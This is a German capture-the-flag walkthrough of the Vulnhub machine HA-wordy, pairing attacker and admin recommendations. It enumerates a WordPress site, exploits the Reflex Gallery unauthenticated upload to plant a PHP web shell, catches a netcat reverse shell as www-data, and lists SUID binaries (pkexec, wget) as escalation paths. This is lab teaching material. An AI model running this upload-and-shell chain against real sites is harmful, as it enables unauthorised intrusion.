HA-wordy - Vulnhub - Level: Easy - Bericht

Reconnaissance

Wie üblich starten wir die Aufklärung mit einem ARP-Scan, um aktive Hosts im lokalen Netzwerk zu finden.

192.168.2.141	08:00:27:bb:2c:c2	PCS Systemtechnik GmbH
                    

**Analyse:** Der ARP-Scan identifiziert einen Host unter der IP-Adresse `192.168.2.141`. Die MAC-Adresse (`08:00:27:bb:2c:c2`) und der Hersteller (PCS Systemtechnik GmbH) deuten auf eine VirtualBox-VM hin.

**Bewertung:** Zielsystem erfolgreich identifiziert. `192.168.2.141` ist die IP für weitere Scans.

**Empfehlung (Pentester):** Führen Sie einen Portscan auf die Ziel-IP durch. Fügen Sie die IP und einen Hostnamen (sobald bekannt) zur lokalen `/etc/hosts`-Datei hinzu.
**Empfehlung (Admin):** Netzwerksegmentierung und -überwachung können helfen, solche Scans zu erkennen und einzudämmen.

 192.168.2.141   hardy.vln
                    

**Analyse:** Die lokale Hosts-Datei des Angreifers wird bearbeitet, um die IP `192.168.2.141` dem Hostnamen `hardy.vln` zuzuordnen. Dieser Name wurde vermutlich während der Nmap-Scans ermittelt.

**Bewertung:** Eine sinnvolle Vorbereitung, um das Ziel über einen Hostnamen ansprechen zu können, was die Interaktion mit Webanwendungen erleichtert.

**Empfehlung (Pentester):** Verwenden Sie `hardy.vln` in URLs und Befehlen, wenn möglich.
**Empfehlung (Admin):** Dieser Schritt betrifft das Angreifersystem. Achten Sie auf eine korrekte DNS-Konfiguration Ihrer Server.

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
                    

**Analyse:** Ein umfassender Nmap-Scan aller TCP-Ports (`-p-`) mit verschiedenen Optionen (`-sS`, `-sC`, `-sV`, `-T5`, `-A`, `-Pn`) wird durchgeführt. Die gefilterte Ausgabe (`grep open`) zeigt, dass ausschließlich Port 80 (HTTP) offen ist. Der Dienst wird als Apache 2.4.29 auf Ubuntu identifiziert.

**Bewertung:** Die Angriffsfläche ist extrem begrenzt und beschränkt sich auf den Webserver. Das Fehlen anderer Ports (wie SSH) ist ungewöhnlich.

**Empfehlung (Pentester):** Konzentrieren Sie sich vollständig auf die Untersuchung des Webservers auf Port 80. Führen Sie spezialisierte Web-Scans durch.
**Empfehlung (Admin):** Eine minimale Angriffsfläche ist gut. Stellen Sie sicher, dass der Webserver sicher konfiguriert und gepatcht ist. Überprüfen Sie Firewall-Regeln.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 23:02 CEST
Nmap scan report for hardy.vln (192.168.2.141)
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (reset)
PRT   STATE SERVICE VERSIN
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:BB:2C:C2 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACERUTE
HP RTT     ADDRESS
1   0.36 ms hardy.vln (192.168.2.141)
                    

**Analyse:** Die vollständige Nmap-Ausgabe bestätigt Port 80 als einzigen offenen Port. Sie zeigt die Apache-Version (2.4.29 auf Ubuntu) und den Titel der Standard-Apache-Seite ("Apache2 Ubuntu Default Page: It works"). Das Betriebssystem wird als Linux (Kernel 4.15 - 5.8) identifiziert.

**Bewertung:** Bestätigt die minimale Angriffsfläche. Die Apache-Version 2.4.29 ist veraltet. Das Vorhandensein der Standard-Apache-Seite deutet darauf hin, dass möglicherweise keine spezifische Webanwendung direkt im Root-Verzeichnis läuft, aber Unterverzeichnisse existieren könnten.

**Empfehlung (Pentester):** Führen Sie Web-Enumerationstools (Nikto, Gobuster/Dirb) aus, um Unterverzeichnisse und Anwendungen zu finden. Prüfen Sie auf bekannte Schwachstellen für Apache 2.4.29.
**Empfehlung (Admin):** Aktualisieren Sie Apache. Entfernen oder ersetzen Sie die Standard-Indexseite.

Web Enumeration

Die Untersuchung konzentriert sich nun auf den Webserver auf Port 80, um versteckte Verzeichnisse, interessante Dateien und spezifische Webanwendungen zu finden.

- Nikto v2.5.0

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present.
+ /: The X-Content-Type-Options header is not set.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5921932b778f0, mtime: gzip.
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54).
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found.
+ /wordpress/wp-links-opml.php: Cookie PHPSESSID created without the httponly flag.
+ /wordpress/wp-links-opml.php: Cookie ec_cart_id created without the httponly flag.
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /wordpress/: Drupal Link header found with value: ; rel="https://api.w.org/".
+ /wordpress/: A Wordpress installation was found.
+ /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag.
+ /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable.
+ /notes.txt: This might be interesting.
+ /wordpress/wp-login.php: Wordpress login found.
+ 1 host(s) tested
                    

**Analyse:** Der Nikto-Scan (`nikto -h 192.168.2.141`) liefert entscheidende Informationen: * Identifiziert ein `/wordpress/`-Verzeichnis und bestätigt eine WordPress-Installation. * Findet spezifische WordPress-Dateien (`wp-links-opml.php`, `wp-login.php`) und Verzeichnisse (`/wp-admin/`, `/wp-content/uploads/`). * Meldet fehlende `httponly`-Flags für mehrere Cookies (PHPSESSID, ec_cart_id, wordpress_test_cookie). * Stellt Verzeichnis-Listing im `/wp-content/uploads/`-Verzeichnis fest. * Findet eine Datei `/notes.txt`. * Bestätigt die veraltete Apache-Version und fehlende Sicherheitsheader. * Die Erwähnung eines "Drupal Link header" ist wahrscheinlich eine Fehlinterpretation der WordPress REST API durch Nikto.

**Bewertung:** Der wichtigste Fund ist die WordPress-Installation unter `/wordpress/`. Dies ist nun der Hauptangriffsvektor. Das Verzeichnis-Listing im Uploads-Ordner und die fehlenden Cookie-Flags sind zusätzliche Schwachstellen. Die Datei `/notes.txt` muss ebenfalls untersucht werden.

**Empfehlung (Pentester):** 1. Führen Sie einen spezialisierten WordPress-Scan mit `wpscan` auf `http://hardy.vln/wordpress/` durch, um die Version, Plugins, Themes und Benutzer zu ermitteln. 2. Untersuchen Sie `/notes.txt`. 3. Prüfen Sie das `/wp-content/uploads/`-Verzeichnis auf interessante hochgeladene Dateien. 4. Versuchen Sie Standard-Logins oder Brute-Force gegen `/wordpress/wp-login.php`.
**Empfehlung (Admin):** 1. Halten Sie WordPress, Themes und Plugins immer auf dem neuesten Stand. 2. Deaktivieren Sie Verzeichnis-Listing für den Uploads-Ordner. 3. Setzen Sie das `httponly`-Flag für alle Cookies. 4. Entfernen Sie unnötige Dateien wie `/notes.txt`. 5. Härten Sie den WordPress-Login (starke Passwörter, 2FA, Limit Login Attempts).

http://hardy.vln/index.html           (Status: 200) [Size: 10918]
http://hardy.vln/info.php             (Status: 200) [Size: 9]
http://hardy.vln/wordpress            (Status: 301) [Size: 310] [--> http://hardy.vln/wordpress/]
http://hardy.vln/javascript           (Status: 301) [Size: 311] [--> http://hardy.vln/javascript/]
http://hardy.vln/notes.txt            (Status: 200) [Size: 28]
http://hardy.vln/secret.zip           (Status: 200) [Size: 261]
                    

**Analyse:** Der Gobuster-Scan (`gobuster dir -u http://hardy.vln ...`) bestätigt die Funde von Nikto (`/wordpress/`, `/notes.txt`) und findet zusätzlich: * `/index.html`: Die Apache-Standardseite. * `/info.php`: Eine PHP-Datei. * `/javascript/`: Ein Verzeichnis (zusätzlich zum üblichen `/js/`). * `/secret.zip`: Eine ZIP-Datei.

**Bewertung:** Gobuster liefert zwei wichtige neue Funde: `/info.php` und `/secret.zip`. Beide sollten genauer untersucht werden. Die Bestätigung von `/wordpress/` und `/notes.txt` unterstreicht deren Relevanz.

**Empfehlung (Pentester):** 1. Untersuchen Sie den Inhalt von `/info.php` (könnte `phpinfo()` enthalten). 2. Laden Sie `/secret.zip` herunter und analysieren Sie es. 3. Untersuchen Sie `/notes.txt`. 4. Starten Sie den `wpscan` gegen `/wordpress/`.
**Empfehlung (Admin):** Entfernen Sie unnötige Dateien wie `/info.php` oder `/secret.zip`. Seien Sie vorsichtig mit `phpinfo()`, da es sensible Konfigurationsdetails preisgibt.

------------------------------------------------------------------------------------------------------

http://hardy.vln/notes.txt
You Need to ZIP Your Wayout

http://hardy.vln/info.php
hardy.vln

------------------------------------------------------------------------------------------------------
                    

**Analyse:** Der Pentester hat die beiden zuvor gefundenen Dateien untersucht: * `/notes.txt`: Enthält den Text "You Need to ZIP Your Wayout". Dies ist ein Hinweis, der sich wahrscheinlich auf das Passwort für die ebenfalls gefundene `/secret.zip`-Datei bezieht. Das Passwort könnte "wayout" sein. * `/info.php`: Enthält nur den Hostnamen "hardy.vln", keine `phpinfo()`-Ausgabe oder andere sensible Daten.

**Bewertung:** Der Hinweis aus `/notes.txt` ist der Schlüssel zur `/secret.zip`. `/info.php` ist in diesem Fall harmlos.

**Empfehlung (Pentester):** Versuchen Sie, `/secret.zip` mit dem Passwort "wayout" zu entpacken.
**Empfehlung (Admin):** Entfernen Sie solche Hinweisdateien und potenziell irreführende oder unnötige Skripte wie `/info.php`.

--2023-10-03 23:03:48--  http://hardy.vln/secret.zip
Auflösen des Hostnamens hardy.vln (hardy.vln)… 192.168.2.141
Verbindungsaufbau zu hardy.vln (hardy.vln)|192.168.2.141|:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 K
Länge: 261 [application/zip]
Wird in secret.zip gespeichert.

secret.zip              100%[==============================>]     261  --.-KB/s    in 0s

2023-10-03 23:03:48 (68,0 MB/s) - secret.zip gespeichert [261/261]
                    

Archive:  secret.zip
[secret.zip] link.txt password:
                    

**Analyse:** Zuerst wird die Datei `secret.zip` mit `wget` heruntergeladen. Anschließend wird versucht, sie mit `unzip secret.zip` zu entpacken. Das Tool fragt nach einem Passwort. Basierend auf dem Hinweis aus `notes.txt` wird wahrscheinlich das Passwort "wayout" eingegeben (obwohl dies im Log nicht sichtbar ist). Der Entpackvorgang scheint zu scheitern oder wird hier nicht weiter gezeigt, da keine extrahierten Dateien aufgelistet werden. Es ist auch möglich, dass das Passwort falsch war oder der Entpackvorgang übersprungen wurde. *Korrektur:* Das Log zeigt nur die Passwortabfrage, keinen Fehler. Es ist unklar, was `link.txt` enthält oder ob der Vorgang erfolgreich war. Da der nächste Schritt `wpscan` ist, scheint der Inhalt der ZIP-Datei nicht unmittelbar relevant gewesen zu sein oder der Pentester hat diesen Pfad vorerst nicht weiterverfolgt.

**Bewertung:** Die ZIP-Datei wurde heruntergeladen und ist passwortgeschützt. Der Versuch, sie zu entpacken, liefert im Log keine klaren Ergebnisse über Erfolg oder Inhalt. Der Fokus wechselt zu WordPress.

**Empfehlung (Pentester):** Falls nicht geschehen, versuchen Sie "wayout" als Passwort. Wenn erfolgreich, analysieren Sie den Inhalt von `link.txt`. Wenn erfolglos, versuchen Sie andere Methoden (Cracking) oder konzentrieren Sie sich auf WordPress, wie im Log geschehen.
**Empfehlung (Admin):** Vermeiden Sie passwortgeschützte ZIP-Dateien mit schwachen oder erratbaren Passwörtern auf Webservern.

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://hardy.vln/wordpress/ [192.168.2.141]
[+] Started: Tue Oct  3 23:14:01 2023

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://hardy.vln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] aarti
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API K
 | Plan: free
 | Requests Done (during the scan): 0
 | Requests Remaining: 16

[+] Finished: Tue ct  3 23:14:01 2023
[+] Requests Done: 27
[+] Cached Requests: 38
[+] Data Sent: 9.568 KB
[+] Data Received: 139.925 KB
[+] Memory used: 153.641 MB
                    

**Analyse:** Der Befehl `wpscan --url http://hardy.vln/wordpress --api-token [TOKEN] -e u` führt einen Scan der WordPress-Installation durch. * `--url http://hardy.vln/wordpress`: Gibt das Ziel an. * `--api-token [TOKEN]`: Verwendet einen API-Token für die WPScan Vulnerability Database (optional, für aktuellere Schwachstellendaten). * `-e u`: Enummeriert Benutzernamen (`u`). Der Scan identifiziert erfolgreich zwei Benutzernamen: `admin` und `aarti` unter Verwendung verschiedener passiver und aggressiver Techniken (Autoren-Posts, RSS, JSON API, Brute-Forcing, Login-Fehler).

**Bewertung:** WPScan bestätigt die Existenz von WordPress und liefert wertvolle Benutzernamen. Diese können nun als Ziele für Passwort-Angriffe auf `/wordpress/wp-login.php` verwendet werden.

**Empfehlung (Pentester):** 1. Versuchen Sie, die Passwörter für `admin` und `aarti` zu erraten oder per Brute-Force (z.B. mit `wpscan --passwords ...` oder Hydra) zu knacken. 2. Führen Sie einen umfassenderen WPScan durch, um auch Plugins, Themes und die WordPress-Version zu ermitteln (`wpscan ... -e vp,vt,u`).
**Empfehlung (Admin):** 1. Verhindern Sie Benutzer-Enumeration, wenn möglich (obwohl dies schwierig ist). Konfigurieren Sie WordPress so, dass keine Benutzernamen in Autoren-Links, RSS-Feeds oder der API preisgegeben werden. 2. Verwenden Sie starke, einzigartige Passwörter für alle Benutzer. 3. Implementieren Sie Mechanismen zur Abwehr von Brute-Force-Angriffen (z.B. Limit Login Attempts Reloaded Plugin, Fail2Ban).

Vulnerability Exploitation (WordPress Reflex Gallery Upload)

Anstatt die gefundenen Benutzernamen `admin` und `aarti` per Brute-Force anzugreifen, identifiziert der Pentester eine Schwachstelle in einem WordPress-Plugin (vermutlich Reflex Gallery, basierend auf dem Dateinamen), die einen nicht-authentifizierten Datei-Upload ermöglicht. Dies wird ausgenutzt, um eine Webshell hochzuladen.

  ....
  ...
  ..
                    

http://127.0.0.1:48080/reflex_gallery.html
upload shell

{"error":"Directory does not exist and could not be created."}
                    

[Tue Oct  3 23:37:55 2023] PHP 8.2.7 Development Server (http://127.0.0.1:48080) started
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50506 Accepted
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50506 [200]: GET /reflex_gallery.html
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50506 Closing
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50522 Accepted
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50522 [404]: GET /favicon.ico - No such file or directory
[Tue Oct  3 23:38:17 2023] 127.0.0.1:50522 Closing
                    

**Analyse:** Der Pentester bereitet den Exploit für eine File-Upload-Schwachstelle im Reflex Gallery Plugin vor. 1. Eine HTML-Datei (`reflex_gallery.html`) wird erstellt (mit `vi`). Sie enthält ein Formular, das Daten per POST an einen spezifischen Endpunkt des Plugins sendet: `.../reflex-gallery/admin/scripts/FileUploader/php.php`. Die URL enthält Parameter für Jahr (`Year=2022`) und Monat (`Month=03`), die den Zielordner für den Upload bestimmen sollen. 2. Ein lokaler PHP-Entwicklungsserver (`php -S 127.0.0.1:48080`) wird gestartet, um die `reflex_gallery.html`-Datei bereitzustellen. 3. Der Pentester öffnet `http://127.0.0.1:48080/reflex_gallery.html` im Browser und versucht, eine Shell hochzuladen. 4. Der erste Versuch schlägt fehl mit der Fehlermeldung `{"error":"Directory does not exist and could not be created."}`. Dies liegt daran, dass der Zielordner (`/wp-content/uploads/2022/03/`) auf dem Server nicht existiert.

**Bewertung:** Eine bekannte Schwachstelle im Reflex Gallery Plugin (wahrscheinlich CVE-2015-4145 oder ähnlich) wird ausgenutzt. Der erste Versuch scheitert an einem falschen Zielpfad, was zeigt, dass der Pfad im Exploit angepasst werden muss.

**Empfehlung (Pentester):** Finden Sie einen gültigen, existierenden Upload-Pfad. Das Verzeichnis-Listing im `/wp-content/uploads/`-Ordner (von Nikto gefunden) kann hier helfen. Passen Sie die `Year`- und `Month`-Parameter in der `action`-URL der `reflex_gallery.html` entsprechend an (z.B. auf 2019/09, basierend auf dem späteren Erfolg).
**Empfehlung (Admin):** Entfernen oder aktualisieren Sie das verwundbare Reflex Gallery Plugin sofort. Überprüfen Sie alle Plugins auf bekannte Schwachstellen und halten Sie sie aktuell. Implementieren Sie Sicherheitsmaßnahmen gegen unauthentifizierte Datei-Uploads.

#http://hardy.vln/wordpress/wp-content/uploads/2015/03/phpshell.php

 Pfad musste auf den richtigen ordner geändert werden

file:///home/cyber/Downloads/reflex_gallery.html
upload shell

{"success":true,"fileName":"\/2019\/09\/phpshell.php"}
                    

http://hardy.vln/wordpress/wp-content/uploads/2019/09

____________________________________________________________________________

Index of /wordpress/wp-content/uploads/2019/09
____________________________________________________________________________
[ICO]	Name			Last modified		Size	Description
____________________________________________________________________________

[ ]	phpshell.php		2023-10-03 14:59 	3.5K	 
____________________________________________________________________________
Apache/2.4.29 (Ubuntu) Server at hardy.vln Port 80
                    

**Analyse:** 1. Die Notiz bestätigt, dass der Pfad angepasst wurde ("Pfad musste auf den richtigen ordner geändert werden"). Statt über den lokalen PHP-Server wird die modifizierte `reflex_gallery.html` nun direkt aus dem lokalen Dateisystem (`file:///...`) im Browser geöffnet. 2. Der erneute Upload-Versuch ist erfolgreich: `{"success":true,"fileName":"\/2019\/09\/phpshell.php"}`. Die Shell wurde in das Verzeichnis `/wordpress/wp-content/uploads/2019/09/` hochgeladen. 3. Der Pentester überprüft dies, indem er das Verzeichnis `http://hardy.vln/wordpress/wp-content/uploads/2019/09` im Browser aufruft. Dank des aktivierten Verzeichnis-Listings wird die hochgeladene `phpshell.php` dort angezeigt.

**Bewertung:** Die Ausnutzung der Schwachstelle war erfolgreich. Die Webshell `phpshell.php` ist nun auf dem Server platziert und über eine bekannte URL erreichbar. Dies ermöglicht den initialen Zugriff.

**Empfehlung (Pentester):** Greifen Sie auf die URL `http://hardy.vln/wordpress/wp-content/uploads/2019/09/phpshell.php` zu, um die Webshell zu aktivieren und eine Reverse Shell oder direkte Befehlsausführung zu starten.
**Empfehlung (Admin):** Beheben Sie die Plugin-Schwachstelle. Deaktivieren Sie Verzeichnis-Listing. Überwachen Sie Upload-Verzeichnisse auf verdächtige Dateien.

Initial Access (Web Shell via Upload)

Die zuvor erfolgreich hochgeladene Webshell (`phpshell.php`) wird nun genutzt, um eine Reverse Shell zum Angreifer-System aufzubauen und somit interaktiven Zugriff als Webserver-Benutzer (`www-data`) zu erlangen.

Listening on 0.0.0.0 4444

------------------------------------------------------------------------------------------------------
Payload: http://hardy.vln/wordpress/wp-content/uploads/2019/09/phpshell.php
------------------------------------------------------------------------------------------------------
                    

Listening on 0.0.0.0 4444
Connection received on 192.168.2.141 47620
Linux ubuntu 5.0.0-27-generic #218.04.1-Ubuntu SMP Thu Aug 22 03:00:32 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 15:02:48 up  1:07,  0 users,  load average: 1.00, 1.01, 1.48
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
                    

**Analyse:** Der Pentester startet einen Netcat-Listener auf Port 4444. Anschließend wird die URL der hochgeladenen Webshell (`http://hardy.vln/.../phpshell.php`) im Browser aufgerufen oder mit einem Tool wie `curl` angestoßen (dieser Schritt ist nicht explizit im Log, aber notwendig). Die `phpshell.php` enthält Code, der eine Reverse Shell zum Listener (192.168.2.199:4444) aufbaut. Der Listener empfängt die Verbindung (`Connection received...`). Systeminformationen und die Benutzer-ID (`uid=33(www-data)`) werden angezeigt, gefolgt von einer einfachen Shell-Eingabeaufforderung (`$`).

**Bewertung:** Initial Access erfolgreich! Eine interaktive Shell als Benutzer `www-data` wurde über die Reverse Shell erlangt.

**Empfehlung (Pentester):** Stabilisieren Sie die Shell (Upgrade zur TTY). Beginnen Sie mit der lokalen Enumeration als `www-data`.
**Empfehlung (Admin):** Entfernen Sie die Webshell. Beheben Sie die zugrundeliegende Upload-Schwachstelle. Implementieren Sie Egress-Filtering und Prozessüberwachung.

Proof of Concept (Reverse Shell)

Die durch den Aufruf der Webshell initiierte Verbindung wurde vom Netcat-Listener auf dem Angreifersystem empfangen. Dies bestätigt die erfolgreiche Etablierung einer Reverse Shell als `www-data`.

uid=33(www-data) gid=33(www-data) groups=33(www-data)

**Analyse:** Der `id`-Befehl wird in der erhaltenen Reverse Shell ausgeführt und bestätigt, dass die Shell als Benutzer `www-data` mit UID/GID 33 läuft.

**Bewertung:** Bestätigt den Benutzerkontext der Reverse Shell.

**Empfehlung (Pentester):** Führen Sie weitere Enumerationsschritte durch.
**Empfehlung (Admin):** Keine spezifische Empfehlung für diesen Bestätigungsschritt.

Lokale Enumeration

Mit der interaktiven Shell als `www-data` untersuchen wir das System lokal, um Benutzer, Berechtigungen und potenzielle Wege zur Privilegieneskalation zu finden.

raj

total 120
drwxr-xr-x 19 raj  raj  4096 Sep 10  2019 .
drwxr-xr-x  3 root root 4096 Sep  8  2019 ..
-rw-------  1 raj  raj  4770 Sep 10  2019 .ICEauthority
-rw-------  1 raj  raj   232 Sep 10  2019 .bash_history
-rw-r--r--  1 raj  raj   220 Sep  8  2019 .bash_logout
-rw-r--r--  1 raj  raj  3771 Sep  8  2019 .bashrc
drwx------ 17 raj  raj  4096 Sep  9  2019 .cache
drwx------ 15 raj  raj  4096 Sep  9  2019 .config
drwx------  3 root root 4096 Sep  9  2019 .dbus
drwx------  3 raj  raj  4096 Sep  9  2019 .gnupg
drwx------  2 root root 4096 Sep  9  2019 .gvfs
drwxr-xr-x  3 raj  raj  4096 Sep  8  2019 .local
drwx------  5 raj  raj  4096 Sep  8  2019 .mozilla
-rw-------  1 root root   39 Sep  9  2019 .mysql_history
-rw-r--r--  1 raj  raj   807 Sep  8  2019 .profile
drwx------  2 raj  raj  4096 Sep  9  2019 .ssh
-rw-r--r--  1 raj  raj     0 Sep  8  2019 .sudo_as_admin_successful
drwxr-xr-x  2 raj  raj  4096 Sep  9  2019 Desktop
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Documents
drwxr-xr-x  2 raj  raj  4096 Sep  9  2019 Downloads
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Music
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Pictures
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Public
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Templates
drwxr-xr-x  2 raj  raj  4096 Sep  8  2019 Videos
-rw-r--r--  1 raj  raj  8980 Sep  8  2019 examples.desktop
-rw-r--r--  1 root root   41 Sep  9  2019 flag1.txt
drwxr-xr-x  2 root root 4096 Sep  9  2019 plugin
                    

aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu

-rw-r--r-- 1 root root 2500 Sep  9  2019 /etc/passwd

**Analyse:** Die Enumeration als `www-data` ergibt: * Es gibt einen Benutzer `raj` mit einem Home-Verzeichnis `/home/raj`. * `www-data` kann das Home-Verzeichnis von `raj` betreten und auflisten (Berechtigungen `drwxr-xr-x` auf `/home/raj`). * Im Home-Verzeichnis befindet sich eine Datei `flag1.txt`, die `root` gehört, aber für alle lesbar ist (`-rw-r--r--`). * Der Inhalt von `flag1.txt` ist der Base64-kodierte String `aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu`, der zur URL `https://www.hackingarticles.in` dekodiert. * Die Datei `/etc/passwd` ist für `www-data` lesbar (Standard). * Es gibt ein `.ssh`-Verzeichnis im Home von `raj`, dessen Inhalt jedoch nicht aufgelistet wird (Berechtigungen `drwx------`). * Eine leere Datei `.sudo_as_admin_successful` existiert, was darauf hindeuten könnte, dass `raj` `sudo`-Rechte hat(te). * Ein Verzeichnis `plugin` existiert ebenfalls, Besitzer ist `root`.

**Bewertung:** Der Hauptfund hier ist der Benutzer `raj` und die (dekodierte) erste Flagge. Die Tatsache, dass `www-data` das Home-Verzeichnis von `raj` lesen kann und dass die Flagge darin `root` gehört, aber weltlesbar ist, deutet auf unsichere Berechtigungskonfigurationen hin. Das `.ssh`-Verzeichnis ist nicht zugänglich. Die `.sudo_as_admin_successful`-Datei ist ein starker Hinweis auf `sudo`-Rechte für `raj`. Das `plugin`-Verzeichnis sollte untersucht werden.

**Empfehlung (Pentester):** 1. Untersuchen Sie das `plugin`-Verzeichnis (`ls -la /home/raj/plugin`). 2. Versuchen Sie, zu Benutzer `raj` zu wechseln (z.B. durch Erraten des Passworts oder Ausnutzen einer Schwachstelle). 3. Wenn ein Wechsel zu `raj` gelingt, führen Sie `sudo -l` aus. 4. Suchen Sie nach anderen Wegen zur Privilegieneskalation (Capabilities, SUID).
**Empfehlung (Admin):** 1. Korrigieren Sie die Berechtigungen für das Home-Verzeichnis von `raj` (sollte `700` oder `750` sein). 2. Setzen Sie korrekte Berechtigungen und Besitzverhältnisse für Dateien wie `flag1.txt`. 3. Entfernen Sie unnötige Hinweisdateien wie `.sudo_as_admin_successful`.

/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
                    

**Analyse:** Der Befehl `getcap -r / 2>/dev/null` sucht nach Dateien mit gesetzten Linux Capabilities. Es werden nur Standard-Capabilities für Netzwerk- und Systemtools gefunden (`mtr-packet`, `gnome-keyring-daemon`, `dumpcap`, `gst-ptp-helper`).

**Bewertung:** Die Suche nach Capabilities liefert keinen offensichtlichen Vektor für Privilegieneskalation.

**Empfehlung (Pentester):** Konzentrieren Sie sich auf andere Vektoren wie SUID-Binaries oder die Ausnutzung von Rechten des Benutzers `raj`.
**Empfehlung (Admin):** Überprüfen Sie regelmäßig gesetzte Capabilities und entfernen Sie unnötige.

   273422    372 -rwsr-xr--   1 root     dip        378600 Jun 12  2018 /usr/sbin/pppd
   134388     76 -rwsr-xr-x   1 root     root        76496 Mar 22  2019 /usr/bin/chfn
   138220     24 -rwsr-xr-x   1 root     root        22520 Mar 27  2019 /usr/bin/pkexec
   134407     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
   135472    148 -rwsr-xr-x   1 root     root       149080 Jan 17  2018 /usr/bin/sudo
   134468     24 -rwsr-xr-x   1 root     root        22528 Jun 28  2019 /usr/bin/arping
   138619    488 -rwsr-xr-x   1 root     root       499264 Apr  8  2019 /usr/bin/wget
   134440     40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /usr/bin/newgrp
   134390     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /usr/bin/chsh
   137716     20 -rwsr-xr-x   1 root     root        18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   134406     76 -rwsr-xr-x   1 root     root        75824 Mar 22  2019 /usr/bin/gpasswd
   133972     12 -rwsr-xr-x   1 root     root        10312 May 14  2019 /usr/bin/vmware-user-suid-wrapper
   285430     12 -rwsr-sr-x   1 root     root        10232 May  2  2019 /usr/lib/xorg/Xorg.wrap
   263429     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   285396     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   285484     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   269200    428 -rwsr-xr-x   1 root     root         436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   269206    108 -rwsr-sr-x   1 root     root         109432 Jul 12  2019 /usr/lib/snapd/snap-confine
                    

**Analyse:** Die Suche nach SUID-Binaries (`find / -type f -perm -4000 ...`) wird erneut durchgeführt. Die Liste enthält wieder viele Standard-Binaries. Auffällig sind: * `/usr/bin/pkexec`: Bekannt anfällig für PwnKit (CVE-2021-4034). * `/usr/bin/sudo`: Standard, aber die Rechte von `raj` müssen geprüft werden. * `/usr/bin/wget`: SUID-Root `wget` ist extrem gefährlich und ungewöhnlich.

**Bewertung:** Es gibt mindestens zwei vielversprechende Vektoren für Privilegieneskalation: 1. **PwnKit (pkexec):** Wenn das System nicht gepatcht ist, ist dies ein einfacher Exploit. 2. **SUID wget:** Kann zum Überschreiben beliebiger Dateien genutzt werden. Die Rechte von `raj` für `sudo` sind ebenfalls zu prüfen.

